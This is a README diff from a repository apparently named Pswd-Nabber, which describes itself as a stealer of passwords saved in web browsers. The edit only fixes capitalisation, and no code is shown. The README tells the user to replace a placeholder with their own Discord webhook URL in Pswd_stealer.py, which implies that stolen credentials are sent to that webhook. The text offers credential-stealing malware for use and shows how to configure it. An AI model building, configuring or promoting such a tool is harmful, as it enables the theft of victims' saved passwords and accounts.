Radioactivebun0/Pswd-Nabber/README.md

 # Pswd-Nabber
 A password stealer for saved passwords on a web browser.
-# you must know that I am not the best programmed and this is just me messing around.
+# You must know that I am not the best programmed and this is just me messing around.

 In Pswd_stealer.py change "Your Discord webhook url" to you webhook url